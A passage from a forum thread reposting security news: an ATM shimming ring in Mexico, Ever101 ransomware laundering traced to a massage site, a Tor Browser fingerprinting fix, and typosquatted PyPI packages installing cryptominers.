from the compromised ATMs. “They found an entire ATM skimming lab that had different versions of that shimmer in untrimmed squares of sheet metal,” Dant said. “But what stood out the most was this unique device — the download card.” The download card (right, in blue) opens an encrypted session with the shimmer, and then transmits the stolen card data to the attached white plastic device. Image: KrebsOnSecurity.com. The download card consisted of two pieces of plastic about the width of a debit card but a bit longer. The blue plastic part — made to be inserted into a card reader — features the same contacts as a chip card. The blue plastic was attached via a ribbon cable to a white plastic card with a green LED and other electronic components. Sticking the blue download card into a chip reader revealed the same Austrian card number seen on the shimming devices. It then became very clear what was happening. “The download card was hard coded with chip card data on it, so that it could open up an encrypted session with the shimmer,” which also had the same card data, Dant said. The download card, up close. Image: KrebsOnSecurity.com. Once inserted into the mouth of ATM card acceptance slot that’s already been retrofitted with one of these shimmers, the download card causes an encrypted data exchange between it and the shimmer. Once that two-way handshake is confirmed, the white device lights up a green LED when the data transfer is complete. THE MASTER KEY Dant said when the Romanian crew mass-produced their shimming devices, they did so using the same stolen Austrian bank card number. What this meant was that now the Secret Service and Citi had a master key to discover the same shimming devices installed in other ATMs. That’s because every time the gang compromised a new ATM, that Austrian account number would traverse the global payment card networks — telling them exactly which ATM had just been hacked. “We gave that number to the card networks, and they were able to see all the places that card had been used on their networks before,” Dant said. “We also set things up so we got alerts anytime that card number popped up, and we started getting tons of alerts and finding these shimmers all over the world.” For all their sleuthing, Dant and his colleagues never really saw shimming take off in the United States, at least nowhere near as prevalently as in Mexico, he said. The problem was that many banks in Mexico and other parts of Latin America had not properly implemented the chip card standard, which meant thieves could use shimmed chip card data to make the equivalent of old magnetic stripe-based card transactions. By the time the Romanian gang’s shimmers started showing up in New York City, the vast majority of U.S. banks had already properly implemented chip card processing in such a way that the same phony chip card transactions which sailed through Mexican banks would simply fail every time they were tried against U.S. institutions. “It never took off in the U.S., but this kind of activity went on like wildfire for years in Mexico,” Dant said. The other reason shimming never emerged as a major threat for U.S. financial institutions is that many ATMs have been upgraded over the past decade so that their card acceptance slots are far slimmer, Dant observed. “That download card is thicker than a lot of debit cards, so a number of institutions were quick to replace the older card slots with newer hardware that reduced the height of a card slot so that you could maybe get a shimmer and a debit card, but definitely not a shimmer and one of these download cards,” he said. Shortly after ATM shimmers started showing up at banks in Mexico, KrebsOnSecurity spent four days in Mexico tracing the activities of a Romanian organized crime gang that had very recently started its own ATM company there called Intacash. Sources told KrebsOnSecurity that the Romanian gang also was paying technicians from competing ATM providers to retrofit cash machines with Bluetooth-based skimmers that hooked directly up to the electronics on the inside. Hooked up to the ATM’s internal power, those skimmers could collect card data indefinitely, and the data could be collected wirelessly with a smart phone. Follow-up reporting last year by the Organized Crime and Corruption Reporting Project (OCCRP) found Intacash and its associates compromised more than 100 ATMs across Mexico using skimmers that were able to remain in place undetected for years. The OCCRP, which dubbed the Romanian group “The Riviera Maya Gang,” estimates the crime syndicate used cloned card data and stolen PINs to steal more than $1.2 billion from bank accounts of tourists visiting the region. Last month, Mexican authorities arrested Florian “The Shark” Tudor, Intacash’s boss and the reputed ringleader of the Romanian skimming syndicate. Authorities charged that Tudor’s group also specialized in human trafficking, which allowed them to send gang members to compromise ATMs across the border in the United States. __________________
  13. A ransomware targeting an Israeli company has led researchers to track a portion of a ransom payment to a website promoting sensual massages. The attack was conducted by a more recent ransomware operation known as Ever101 who compromised an Israeli computer farm and proceeded to encrypt its devices. In a new report by Israeli cybersecurity firms Profero and Security Joes, who performed incident response on the attack, the Ever101 is believed to be a variant of the Everbe or Paymen45 ransomware. When encrypting files, the ransomware will append the .ever101 extension and drop a ransom note named !=READMY=!.txt in each folder on the computer. Example Ever101 ransom note While investigating one of the infected machines, the researchers found a 'Music' folder that contained various tools used during the attack, providing insight into the threat actor's tactics, techniques, and procedures. "During our investigation of the infected machines, we came across what seemed to be a treasure trove of information stored in the Music folder. It consisted of the ransomware binary itself, along with several other files—some encrypted, some not—that we believe the threat actors used to gather intelligence and propagate through the network," explains Profero's and Security Joe's report. The known tools used by the Ever101 gang include: xDedicLogCleaner - Cleans all Windows event logs, system logs, and the temp folder. PH64.exe - 64-bit version of the Process Hacker program Cobalt Strike - The threat actors deployed cobalt Strike to provide remote access to machines and perform surveillance on the network. In this particular attack, the Cobalt Strike beacon was embedded in a WEXTRACT.exe file with an expired Microsoft signature. SystemBC - SystemBC was used to proxy Cobalt Strike traffic through SOCKS5 proxy to avoid detection. Other tools were also found but were encrypted by the ransomware. Based on the names and other characteristics, the researchers believe the ransomware gang used the following tools as well: SoftPerfect Network Scanner - An IPv4/IPv6 network scanner. shadow.bat - Likely a batch file used to clear Shadow Volume Copies from the Windows device. NetworkShare_pre2.exe - Enumerates a Windows network for shared folders and drives. Of interest is that some of the files shared by the attackers, such as WinRar, were localized in Arabic. WinRar with Arabic localization Profero CEO Omri Moyal told BleepingComputer that he believes the Arabic localization to some of these tools is a "false flag." Following the money to a sensual massage Of particular interest is what the researchers discovered after they used CipherTrace to track the ransom payment as it flowed through different bitcoin wallets. While tracing the payment, they found a small portion, 0.01378880 BTC or approximately $590, was sent to a 'Tip Jar' on the RubRatings site. RubRatings is a website that allows "massage and body rub providers" in the USA to advertise their services, many of them offering sensual massages and showing barely nude pictures. Each masseuse profile includes a Tip Jar button that allows customers to leave a bitcoin tip for their recent massage. RubRatings Bitcoin Tip Jar The researchers believe that some of the ransom payment went to an Ever101 operative in the USA, who then used the coins to tip a masseuse, or more likely, use the site as a way to launder the ransom payment. "The second possibility is that the provider on the site was used as another method of obfuscating the bitcoin movement," the researchers explain. "It could be that the provider who possesses the bitcoin wallet in question was working with the threat actor(s), but more likely, it is a fake account set up to enable money transfers." "The bitcoin in the wallet linked to RubRatings received the payment around 15:48 UTC, and it left the wallet just a few minutes later, at 15:51 UTC." As bitcoin is becoming more easily traced, and even recovered by law enforcement, ransomware operations are looking for novel approaches to launder their ill-gotten gains. It is likely that the threat actors created a fake account on RubRatings and were using the Tip Jar feature as a way to launder the ransom by making it look like a tip to a masseuse. __________________
  14. The Tor Project has released Tor Browser 10.0.18 to fix numerous bugs, including a vulnerability that allows sites to track users by fingerprinting the applications installed on their devices. In May, JavaScript fingerprinting firm FingerprintJS disclosed a 'scheme flooding' vulnerability that allows the tracking of users across different browsers based on the applications installed on their device. To track users, a tracking profile is created for a user by attempting to open various application URL handlers, such as zoommtg://, and checking if the browser launches a prompt, like the one for Zoom below.. Zoom URL Handler If the application's prompt is displayed, it can be assumed that the application is installed on the device. By checking for numerous URL handlers, the vulnerability can create an ID based on the unique configuration of installed apps on the user's device. This ID can then be tracked across different browsers, including Google Chrome, Edge, Tor Browser, Firefox, and Safari. This vulnerability is especially concerning for Tor users who use the browser to protect their identity and IP address from being logged with sites. As this vulnerability tracks users across browsers, it could allow web sites, and even law enforcement, to track a user's real IP address when they switch to a non-anonymizing browser, such as Google Chrome. With the release of Tor Browser 10.0.18, the Tor Project has introduced a fix for this vulnerability by setting the 'network.protocol-handler.external' setting to false. This default setting will prevent the browser from passing the handling of a particular URL to an external application and thus no longer trigger the application prompts. Full changelog The full changelog for Tor 10.0.18 is: All Platforms Update Tor to 0.4.5.9 Android Update Fenix to 89.1.1 Update NoScript to 11.2.8 Bug 40055: Rebase android-components patches on 75.0.22 for Fenix 89 Bug 40165: Announce v2 onion service deprecation on about:tor Bug 40166: Hide "Normal" tab (again) and Sync tab in TabTray Bug 40167: Hide "Save to Collection" in menu Bug 40169: Rebase fenix patches to fenix v89.1.1 Bug 40170: Error building tor-browser-89.1.1-10.5-1 Bug 40432: Prevent probing installed applications Bug 40470: Rebase 10.0 patches onto 89.0 Build System Android Bug 40290: Update components for mozilla89-based Fenix You can upgrade to Tor Browser 10.0.18 by opening the menu, going to Help, and selecting About Tor Browser, which will automatically check for and install any new updates. You can also download the latest browser from the Tor Browser download page and the distribution directory. __________________
  15. This week, multiple malicious packages were caught in the PyPI repository for Python projects that turned developers' workstations into cryptomining machines. All malicious packages were published by the same account and tricked developers into downloading them thousands of times by using misspelled names of legitimate Python projects. Bash script pulls in miner A total of six packages containing malicious code infiltrated the Python Package Index (PyPI) in April: maratlib maratlib1 matplatlib-plus mllearnlib mplatlib learninglib All came from user “nedog123” and the names of most of them are misspelled versions of the matplotlib legitimate plotting software. Ax Sharma, a security researcher at devops automation company Sonatype, analyzed the “maratlib” package in a blog post, noting that it was used as a dependency by the other malicious components. “For each of these packages, the malicious code is contained in the setup.py file which is a build script that runs during a package’s installation,” the researcher writes. While analyzing the package, Sharma found that it attempted to download a Bash script (aza2.sh) from a GitHub repository that is no longer available. Sharma tracked the author’s aliases on GitHub using open-source intelligence and found that the script’s role was to run a cryptominer called “Ubqminer” on the compromised machine. The researcher also notes that the malware author replaced the default Kryptex wallet address with their own to mine for Ubiq cryptocurrency (UBQ). In another variant, the script included a different cryptomining program that uses GPU power, the open-source T-Rex. Attackers are constantly targeting open-source code repositories like PyPI [1, 2, 3], the NPM for NodeJS [1, 2, 3], or RubyGems. Even if the detection comes when the download count is low, as it typically happens, there is a significant risk as developers may integrate the malicious code in widely used projects. In this case, the six malicious packages were caught by Sonatype after scanning the PyPI repo with its automated malware detection system, Release Integrity. At detection time, the packages had accumulated almost 5,000 downloads since April, with “maratlib” recording the highest download count, 2,371. __________________
×
×
  • Create New...